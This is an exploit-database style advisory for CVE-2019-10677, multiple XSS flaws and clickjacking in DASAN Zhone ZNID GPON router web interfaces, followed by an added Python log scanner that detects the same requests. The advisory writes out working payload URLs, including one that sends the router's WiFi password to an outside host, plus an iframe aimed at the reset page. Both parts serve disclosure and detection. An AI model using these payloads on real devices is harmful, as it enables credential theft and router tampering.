CVE-2019-10677 – Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU

Multiple Cross-Site Scripting (XSS) vulnerabilities in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 allow a remote attacker to execute arbitrary JavaScript via manipulation of unsanitized GET parameters. This vulnerability affects all zNID models running the following firmware versions: all releases of 3.0.xxx SW (on the 3.0 branch), release 3.1.349 and earlier (on the 3.1 branch), release 3.2.087 and earlier (on the 3.2 branch), release 4.1.253 and earlier (on the 4.1 branch), release 5.0.019 and earlier (on the 5.0 branch). Details: https://blog.redteam.pl/2019/09/cve-2019-10677-dasan-zhone-znid.html

# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
# Date: 31.03.2019
# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
# Vendor Homepage: https://dasanzhone.com
# Version: <= S3.1.285
# Alternate Version: <= S3.0.738
# Tested on: version S3.1.285 (alternate version S3.0.738)
# CVE : CVE-2019-10677

= Reflected Cross-Site Scripting (XSS) =
http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp

= Stored Cross-Site Scripting (XSS) =
* WiFi network plaintext password
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
* CSRF token
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//

= Clickjacking =
<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>

= Attack scenario =
http://admin:[email protected]/wlsecrefresh.wl?wl_wsc_reg=';document.location=/*&wlWscCfgMethod=*/'//redteam.pl/'%2BwpaPskKey;//
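As an added detection example (not part of the advisory), the scanner below reads web-access log lines from the device or an upstream proxy and flags requests to the two endpoints named above whose reflected parameters carry HTML- or JavaScript-context-breaking input. The log format and the sample lines are constructed assumptions; the endpoint and parameter names come from the advisory.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Endpoints and reflected parameters named in the advisory.
WATCHED = {
    "/zhndnsdisplay.cmd": {"fileKey", "name", "interface"},
    "/wlsecrefresh.wl": {"wl_wsc_reg", "wlWscCfgMethod"},
}
# Characters/tokens that break out of the HTML or JS string context the values land in.
SUSPICIOUS = re.compile(r"[<>'\"]|javascript:|document\.|\balert\s*\(", re.IGNORECASE)
# Assumed combined-log style line: ip ident user [ts] "METHOD url PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

def query_params(query):
    """Split a query string on '&' only (';' is payload here), decoding twice to catch double encoding."""
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            yield unquote_plus(key), unquote_plus(unquote_plus(value))

def suspicious_params(url):
    """Return {param: decoded value} for watched parameters that contain context-breaking input."""
    parts = urlsplit(url)
    watched = WATCHED.get(parts.path)
    if not watched:
        return {}
    return {k: v for k, v in query_params(parts.query)
            if k in watched and SUSPICIOUS.search(v)}

def scan_log(lines):
    """Return one alert dict per log line that hits a watched endpoint with suspicious input."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m.group("url"))
        if hits:
            alerts.append({"ip": m.group("ip"), "path": urlsplit(m.group("url")).path, "params": hits})
    return alerts

# Constructed sample log lines (not real traffic); payloads are the advisory's own PoCs.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Mar/2019:10:00:01 +0000] "GET /zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp HTTP/1.1" 200 512',
    '192.0.2.11 - - [31/Mar/2019:10:00:02 +0000] "GET /wlsecrefresh.wl?wlWscCfgMethod=%27;alert(sessionKey);// HTTP/1.1" 200 811',
    '192.0.2.12 - - [31/Mar/2019:10:00:03 +0000] "GET /wlsecrefresh.wl?wlWscCfgMethod=PBC HTTP/1.1" 200 811',
    '192.0.2.13 - - [31/Mar/2019:10:00:04 +0000] "GET /resetrouter.html HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```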
